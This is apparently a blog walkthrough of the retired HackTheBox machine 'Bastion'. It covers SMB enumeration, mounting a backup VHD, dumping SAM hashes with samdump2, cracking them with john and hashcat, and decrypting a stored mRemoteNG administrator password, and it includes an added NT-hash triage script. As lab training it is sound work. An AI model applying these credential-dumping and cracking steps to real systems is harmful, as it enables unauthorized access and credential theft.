HTB’s Bastion: A Walkthrough
Hello readers,
In this article, I will guide you through solving HTB's 'Bastion', a retired box.
Credits for creating this box go to L4mpje. Thank you, as this box helped me get started on Windows hacking.
The target's address is 10.10.10.134.
RECONNAISSANCE
Firstly, we perform an nmap scan of our target:
- Command: nmap -sS 10.10.10.134 -p 0-65535 -vv
We get,
ENUMERATION
Let's start by enumerating the SMB server residing on port 139.
Since we have no credentials, we attempt an anonymous login:
- Command: smbclient -L //10.10.10.134
We try 'admin' as the password but are denied. We do, however, get to see the SMB shares.
Out of these, the 'Backups' share interests us. Let's target it:
- Command: smbclient //10.10.10.134/Backups
We get in using the password: password
We now run the following smbclient commands to download files off the server:
- tarmode
- recurse
- prompt
- mget note.txt (we did not specify a destination path, so it is saved to /root)
Similarly, mget SDT65CB.tmp and WindowsImageBackup.
We go to /root to analyze our files.
Opening note.txt ,we find,
Trying to view the SDT65CB.tmp file does not show anything. A 'strings' analysis did not reveal anything either.
Then we have WindowsImageBackup, which is a directory.
Inside it, we find a directory named 'L4mpje-PC'. Opening it, we find,
From enumeration, we find that both the 'Catalog' and 'SPPMetadataCache' directories are empty. Verified by checking the SMB server too.
Next, we target the 'Backup 2019' directory.
We find there are 2 virtual hard disk (.vhd) files within it,
one of 300 MB and another of 5 GB.
NOTE: A dollar sign at the end of a share name indicates a hidden share.
OBJECTIVE: Mount the Hard Disks, analyze and enumerate
We have two possible pathways:
1) Download the .vhd and other associated backup files, or 2) mount them on our system directly from the share.
TIP: Do not mount the files you downloaded; mount them from the SMB share itself.
First, I create a mount point, /mnt/L4mpje-PC, and then mount the 'Backups' share directly from the SMB server:
- Command: mount -t cifs //10.10.10.134/Backups /mnt/L4mpje-PC -o user=anonymous
Knowledge Nugget
What is CIFS? CIFS (Common Internet File System) is a dialect of the SMB protocol; the Linux cifs mount type speaks SMB to the server.
Now, we wade into /mnt/L4mpje-PC/WindowsImageBackup/L4mpje-PC/Backup…../ and select the 5 GB VHD (9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd).
For mounting, we use guestmount to mount this VHD onto another directory/mount point, /mnt/Backup3, to make our analysis easier.
To install guestmount: apt install guestmount
- Command: guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/Backup3 (be sure to run this from the exact directory where the VHD is stored)
Now, wading into /mnt/Backup3, we get this listing,
Enumerating each directory,
- Users: in total, we have 5 users: 'Default User', desktop.ini, L4mpje and Public
There are hashes present in /Windows/System32/config.
We need to crack them.
NOTE: When in a drive, make your way to the config directory, where there are hashes to dump. These are NTLM hashes, which are protected by SYSKEY.
Tools used to dump them: pwdump and samdump2.
Here, we use samdump2:
- Command: samdump2 SYSTEM SAM (SYSTEM and SAM are the registry hive files from which we obtain the hashes)
We get,
Which part is the password?
Syntax: <Name>:<User number>:hashed_username:hashed_password:::
So for Administrator, hashed password = 31d6cfe0d16ae931b73c59d7e0c089c0
And so on for the other 2 users, Guest and L4mpje.
We are able to crack the L4mpje user's password using Crackstation, JohnTheRipper and hashcat.
Crackstation (successful crack):
Username: L4mpje
Password: bureaulampje. It has also identified the correct type of hash, i.e. NTLM.
JohnTheRipper (alternate method, also successful):
Command: john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt Hash
Hashcat (alternate method, also successful):
Command: hashcat -m 1000 Hash /usr/share/wordlists/rockyou.txt --force
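Why the Administrator value above is not really "crackable" and why the L4mpje one falls to a wordlist is easiest to see by computing NT hashes yourself. The following is an added example, not code from the original post: a pure-Python MD4 (the NT hash is MD4 over the UTF-16LE password, with no salt) and a small triage function for pwdump-format lines (user:RID:LM hash:NT hash:::) that flags blank passwords (31d6cfe0… is the MD4 of the empty string, exactly the Administrator value shown) and wordlist hits. The sample dump lines and wordlist are constructed here.

```python
import struct
# MD4 of the empty string is the NT hash of a blank password (the Administrator value above).
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
MASK = 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is MD4 over UTF-16LE, unsalted."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    # Pad to 56 mod 64 bytes, then append the original bit length little-endian.
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    rounds = (  # (function, word order, additive constant, per-step shifts)
        (F, range(16), 0, (3, 7, 11, 19)),
        (G, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), 0x5A827999, (3, 5, 9, 13)),
        (H, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), 0x6ED9EBA1, (3, 9, 11, 15)),
    )
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):  # one 512-bit block per iteration
        X = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for f, order, k, shifts in rounds:
            for j, i in enumerate(order):
                a = rol((a + f(b, c, d) + X[i] + k) & MASK, shifts[j % 4])
                a, b, c, d = d, a, b, c  # rotate registers for the next step
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    return md4(password.encode("utf-16-le")).hex()

def triage_pwdump(lines, wordlist):
    """Classify pwdump-format lines (user:RID:LM hash:NT hash:::) by NT hash."""
    lookup = {nt_hash(w): w for w in wordlist}  # hash each word once, unsalted
    findings = {}
    for line in lines:
        user, _rid, _lm, nt = line.strip().split(":")[:4]
        nt = nt.lower()
        if nt == EMPTY_NT_HASH:
            findings[user] = "blank password"
        elif nt in lookup:
            findings[user] = "wordlist hit: " + lookup[nt]
        else:
            findings[user] = "not in wordlist"
    return findings

# Constructed sample: Administrator carries the article's value, L4mpje's line is built from the recovered password.
SAMPLE_DUMP = [
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:" + EMPTY_NT_HASH + ":::",
    "L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:" + nt_hash("bureaulampje") + ":::",
]
```

Because the hash is unsalted, the wordlist only has to be hashed once and every account is checked against it; this is the same check a backup review should run, since a SAM sitting in a world-readable backup share is as sensitive as the live system.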
GAINING & MAINTAINING ACCESS
We now log in via SSH: ssh L4mpje@10.10.10.134
We have successfully logged in.
Let's display the directory contents.
We move on to /Desktop and find our first flag, 'user.txt'.
Now we have to escalate our privileges: find a vulnerability or a vulnerable program, exploit it and leverage it.
In /Favorites, I find a link which, when opened in a browser, redirects us to Bing's homepage.
NOTE: Important directories to check for vulnerable programs: C:\Program Files (x86) and C:\Program Files
In C:\Program Files (x86), we have the following installed programs,
Out of these, mRemoteNG supposedly has a vulnerability: it stores users' hashed passwords locally in a file named confCons.xml.
We traverse to C:\Users\L4mpje\AppData\Roaming\mRemoteNG
and find our confCons.xml file, which contains,
The one ending with == is the Administrator's password.
Base64-decoding it only gives back gibberish.
We instead have to use a tool named 'mRemoteNG-Decrypt'.
Steps:
1) Clone it onto our system: git clone https://github.com/haseebT/mRemoteNG-Decrypt.git
2) Enter the mRemoteNG-Decrypt directory
3) Run the Python script it provides to decode the password
Syntax: python3 mremoteng_decrypt.py -s <Hashtocrack>
Command to crack:-
- python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHFOuS17QTdT9kVqtKCPeoCONw5dmaPFjNO2kt/z05xDgE4HdVmHAowVRdC7emf7lWWAlOdOKiw==
We have cracked the password for Administrator.
Password: thXLHM96BeKLOER2
We use it to log in via SSH as Administrator.
We capture the flag at C:\Users\Administrator\Desktop, in a file named root.txt:
We also get this badge from HackTheBox
REPORTING
Well, you have it now!
Conclusions:-
- This box can help you get familiar with Windows hacking methodologies.
- Windows boxes are easier to enumerate (IMHO).
- It helped me understand that hashes stored in plain sight can be vulnerable and easily cracked.
Thanks for reading this blog entry and making it this far. Until next time, there must be some more Windows boxes out there for me to pwn……